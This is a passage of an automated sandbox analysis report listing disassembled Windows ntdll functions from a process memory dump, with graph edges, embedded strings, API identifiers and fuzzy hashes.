1a9950f 516->526 517->496 527 1a993e5 517->527 518->476 524 1a9942a-1a99430 518->524 528 1a4d9bc-1a4d9be 519->528 529 1a99533-1a99536 519->529 520->528 521->492 522->498 530 1a99412 522->530 523->518 531 1a99432-1a9944f 524->531 532 1a99457-1a99460 524->532 525->521 526->509 527->476 533 1a99549-1a9954e 528->533 534 1a4d9c4-1a4d9cb 528->534 529->528 535 1a9953c-1a99544 529->535 530->476 531->532 536 1a99451-1a99454 531->536 537 1a99462-1a99467 532->537 538 1a994a7-1a994a9 532->538 533->451 539 1a99554 533->539 534->471 534->473 535->481 536->532 537->538 540 1a99469-1a9946d 537->540 541 1a994ab-1a994c6 call 1a34508 538->541 542 1a994cc-1a994ce 538->542 539->491 543 1a9946f-1a99473 540->543 544 1a99475-1a994a1 RtlDebugPrintTimes 540->544 541->451 541->542 542->451 543->538 543->544 544->538 548 1a994a3 544->548 548->538
                                            APIs
                                            Strings
                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01A99346
                                            • GsHd, xrefs: 01A4D874
                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 01A99341, 01A99366
                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01A9936B
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                            • API String ID: 3446177414-576511823
                                            • Opcode ID: be2b1571bce331b9bf063648a32df96213a7559be2db60d49090715b7155533a
                                            • Instruction ID: cecdc8b6b5974a7c08a19e434aef7e8a9e649d92d29d51bb4b7686699a28c006
                                            • Opcode Fuzzy Hash: be2b1571bce331b9bf063648a32df96213a7559be2db60d49090715b7155533a
                                            • Instruction Fuzzy Hash: 77E1B7746043429FEB21CF69C480B6BBBF5BF98318F04496DE995CB282D771E984CB52
                                            Function 01A7B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 549 1a7b5ec-1a7b5fc 550 1a7b600-1a7b602 549->550 551 1a7b5fe 549->551 552 1a7b830-1a7b844 call 1a74b87 550->552 553 1a7b608-1a7b60d 550->553 551->550 554 1a7b621-1a7b62e 553->554 555 1a7b60f-1a7b612 553->555 558 1a7b631-1a7b63d call 1a7b5e6 554->558 555->552 557 1a7b618-1a7b61b 555->557 557->552 557->554 562 1a7b63f-1a7b644 558->562 563 1a7b64a-1a7b653 558->563 562->562 564 1a7b646-1a7b648 562->564 565 1a7b655-1a7b658 563->565 566 1a7b65a-1a7b65d 563->566 564->558 567 1a7b65f-1a7b662 565->567 566->567 568 1a7b665-1a7b66d 566->568 567->568 569 1a7b690-1a7b693 568->569 570 1a7b66f-1a7b672 568->570 573 1a7b695-1a7b698 569->573 574 1a7b6ad-1a7b6d4 call 1a76810 569->574 571 1a7b674 570->571 572 1a7b67c-1a7b680 570->572 576 1a7b676-1a7b67a 571->576 577 1a7b682-1a7b684 572->577 578 1a7b68a-1a7b68d 572->578 573->574 579 1a7b69a-1a7b69e 573->579 584 1a7b6d7-1a7b6e9 call 1a7b5e6 574->584 576->574 577->578 583 1a7b686-1a7b688 577->583 578->569 580 1a7b6a4-1a7b6aa 579->580 581 1a7b6a0-1a7b6a2 579->581 580->574 581->574 581->580 583->576 587 1a7b6f3-1a7b704 call 1a7b5e6 584->587 588 1a7b6eb-1a7b6f1 584->588 597 1a7b791-1a7b794 587->597 598 1a7b70a-1a7b713 587->598 589 1a7b71b-1a7b727 588->589 591 1a7b797 589->591 592 1a7b729-1a7b735 589->592 594 1a7b79a-1a7b79e 591->594 595 1a7b737 592->595 596 1a7b766-1a7b769 592->596 599 1a7b7a0-1a7b7a2 594->599 600 1a7b7ad-1a7b7b0 594->600 601 1a7b73e-1a7b741 595->601 602 1a7b739-1a7b73c 595->602 603 1a7b76c-1a7b786 call 1a76580 596->603 597->591 604 1a7b715 598->604 605 1a7b718 598->605 606 1a7b7a7-1a7b7ab 599->606 607 1a7b7a4 599->607 610 1a7b7b2-1a7b7b5 600->610 611 1a7b7df-1a7b7ed call 1abd8b0 600->611 608 1a7b757-1a7b762 601->608 609 1a7b743-1a7b746 601->609 602->596 602->601 627 1a7b789-1a7b78c 603->627 604->605 605->589 614 1a7b815-1a7b81a 606->614 607->606 608->594 618 1a7b764 608->618 609->608 615 1a7b748-1a7b74e 609->615 616 1a7b7b7-1a7b7ba 610->616 617 1a7b80f 610->617 628 1a7b7f7-1a7b7fa 611->628 629 1a7b7ef-1a7b7f5 611->629 625 1a7b81e-1a7b821 614->625 626 1a7b81c 614->626 615->603 621 1a7b750 615->621 623 1a7b7ce-1a7b7d3 616->623 624 1a7b7bc-1a7b7c1 616->624 622 1a7b812 617->622 618->627 621->608 630 1a7b752-1a7b755 621->630 622->614 623->617 634 1a7b7d5 623->634 624->611 631 1a7b7c3-1a7b7c6 624->631 632 1a7b823-1a7b827 625->632 633 1a7b829-1a7b82f 625->633 626->625 627->584 635 1a7b805-1a7b80d 628->635 636 1a7b7fc-1a7b803 628->636 629->614 630->603 630->608 631->622 637 1a7b7c8-1a7b7ca 631->637 632->633 634->611 638 1a7b7d7-1a7b7dd 634->638 635->614 636->614 637->611 639 1a7b7cc 637->639 638->611 638->622 639->622
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                            • Instruction ID: 680f3dd72b9caef1b6752b9ae22d1ca11686dac706fe6d961917fed82e30415d
                                            • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                            • Instruction Fuzzy Hash: 8E8190B0E062499EEF25CF6CCC917FEBBB2AF45320F1C4259D961A7291C7349A408B71
                                            Function 01A39126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $$@
                                            • API String ID: 3446177414-1194432280
                                            • Opcode ID: efbb1bdf22cb694a02c8a700d9c9bed894c4c78201eec68d80d6e95f5f2824e0
                                            • Instruction ID: 6795246f36e7f1d6c3f14415db0d3b730e1f717c155c1f4a55f34640d86a4d33
                                            • Opcode Fuzzy Hash: efbb1bdf22cb694a02c8a700d9c9bed894c4c78201eec68d80d6e95f5f2824e0
                                            • Instruction Fuzzy Hash: C6811B72D002699BDB318F54CD44BEABBB4AF48714F0441DAEA1DB7280D7705E85CFA0
                                            Function 01A74960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: 0Iv$0Iv$0Iv$X
                                            • API String ID: 3446177414-728256981
                                            • Opcode ID: 7fe2a661409cc9f56337a524a9a2d0e054b444560aa6da25ef9ddcdb20cf43c2
                                            • Instruction ID: 6164ceb4523bd281ae939c9cc0f5b7bae02762263ea125d491eb265554d6068d
                                            • Opcode Fuzzy Hash: 7fe2a661409cc9f56337a524a9a2d0e054b444560aa6da25ef9ddcdb20cf43c2
                                            • Instruction Fuzzy Hash: 87319F3190025AEBEF32EF5ADC44B8D3BB1AB88759F004059FD1897251D3748B65CF96
                                            Function 01A5DB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                            • API String ID: 3446177414-56086060
                                            • Opcode ID: d0f522d869de1f135b6b1c32eee355568fe27649577726f652b1633cc26edeb6
                                            • Instruction ID: 54e3b24018c5c1a3304624e580c4fa784c8105a6b4a32f126c3df18dbfc6ea93
                                            • Opcode Fuzzy Hash: d0f522d869de1f135b6b1c32eee355568fe27649577726f652b1633cc26edeb6
                                            • Instruction Fuzzy Hash: 68415471604381EFDB22DFACC584B6ABBF5FF04724F148069EA4197691C778A8C4CB91
                                            Function 01AB4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • LdrpCheckRedirection, xrefs: 01AB488F
                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01AB4888
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01AB4899
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 3446177414-3154609507
                                            • Opcode ID: d7d9715ac0a5ba08e088d2568d43da80bc33b60810df892e9732c2c00aeaa38c
                                            • Instruction ID: 05ebba76fc67ebc7d262617ecbc88214761248ba9f3f64ea7ad871e8c40d8db7
                                            • Opcode Fuzzy Hash: d7d9715ac0a5ba08e088d2568d43da80bc33b60810df892e9732c2c00aeaa38c
                                            • Instruction Fuzzy Hash: 4641B272A046D19BCB22CFADD980AA67BECBF4D650F050559ED8A97253D730E840CB91
                                            Function 01A5DBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                            • API String ID: 3446177414-3526935505
                                            • Opcode ID: 9029d44c09ca88e5047a5792bd346696e5e1f0f21319da71fa2b4a6ab389d03b
                                            • Instruction ID: a1d12bd2346ab03cfd693585e189ba8f43a5b7815470153aac9c95b481d18a6c
                                            • Opcode Fuzzy Hash: 9029d44c09ca88e5047a5792bd346696e5e1f0f21319da71fa2b4a6ab389d03b
                                            • Instruction Fuzzy Hash: 5931D531208794EFDB73DB6CC949B6A7BE4EF01B50F084059E846C76A2C7B8A9C4C761
                                            Function 01A2C070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $
                                            • API String ID: 3446177414-3993045852
                                            • Opcode ID: a87f80dd3ec6edc9fa208d4816506b695e0aa3cf8b0ee702814e05c8e4df767f
                                            • Instruction ID: 480418c2b9adc088afce94cea51a15532fd39c050aadd4ba60d5787bdecbbe87
                                            • Opcode Fuzzy Hash: a87f80dd3ec6edc9fa208d4816506b695e0aa3cf8b0ee702814e05c8e4df767f
                                            • Instruction Fuzzy Hash: 73116132A14218FBCF25AF95E948A9C7B72FF44365F148129FD6A6B2D0CB715A04CF40
                                            Function 01A5EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cbd644aa75b3372e8aab30a00097554d993eb7c90ca51ee6241c7216813a9d9f
                                            • Instruction ID: f282d90ea4763c9367d01b3cb24f600b125876338c82e3e28b80068d71f533d0
                                            • Opcode Fuzzy Hash: cbd644aa75b3372e8aab30a00097554d993eb7c90ca51ee6241c7216813a9d9f
                                            • Instruction Fuzzy Hash: 1CE1FEB0D04708DFCF65CFA9D984AADBBF1BF48314F24452AEA46A7261D770A981CF50
                                            Function 01AAEF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: e7539640128cb8f70c2f0706befb28f9e5ab967bb7a2197e9e329591fee82c6e
                                            • Instruction ID: 0908f5ccd22e0f18c19610a8734d1a2aa622873422cf98c5468f96ed6ef8a5e2
                                            • Opcode Fuzzy Hash: e7539640128cb8f70c2f0706befb28f9e5ab967bb7a2197e9e329591fee82c6e
                                            • Instruction Fuzzy Hash: BA711671E00219AFDF09CFA9C984ADDBBB5FF48314F58402AEA05EB254D734AA05CF94
                                            Function 01AAF1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: 5c7c1d0fbb6104a683eca3ea37d3a5238c7c77095321d816836f02839c080e1b
                                            • Instruction ID: 510759aa7a616f88a7912bac2841ad0a78bec4b4c93d14ea46eadcc573eb9593
                                            • Opcode Fuzzy Hash: 5c7c1d0fbb6104a683eca3ea37d3a5238c7c77095321d816836f02839c080e1b
                                            • Instruction Fuzzy Hash: 41514376E00219AFEF09CF99D844ADDBBF1BF48314F58812AE915BB250D7349A09CF64
                                            Function 01A67B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes$BaseInitThreadThunk
                                            • String ID:
                                            • API String ID: 4281723722-0
                                            • Opcode ID: c7db5a88ac887b66260eda1a7ab0e97e3f4cf883bf253e1b76a85f8305674265
                                            • Instruction ID: c7b7d7cdab495456b0a8d55dbda04d2e5fc60bb4fb27e5df1fb74dc31de52057
                                            • Opcode Fuzzy Hash: c7db5a88ac887b66260eda1a7ab0e97e3f4cf883bf253e1b76a85f8305674265
                                            • Instruction Fuzzy Hash: 0B313675E00229EFCF25EFA9D985AADBBF0FB48720F24412AE911B7290CB755901CF54
                                            Function 01A359C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: 7dd4990f18fb554ea0c6075f2762744058eb177ff4ac61d015efb615971239c8
                                            • Instruction ID: ad18c4e6a34d0b5831be763b680208e03e5fc6b186aa150a5882d2f6dc235bf1
                                            • Opcode Fuzzy Hash: 7dd4990f18fb554ea0c6075f2762744058eb177ff4ac61d015efb615971239c8
                                            • Instruction Fuzzy Hash: 49326870D0426ADFDB25CF68C984BEDBBB4BF49304F0481E9E549A7281D7749A84CF91
                                            Function 01A77D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
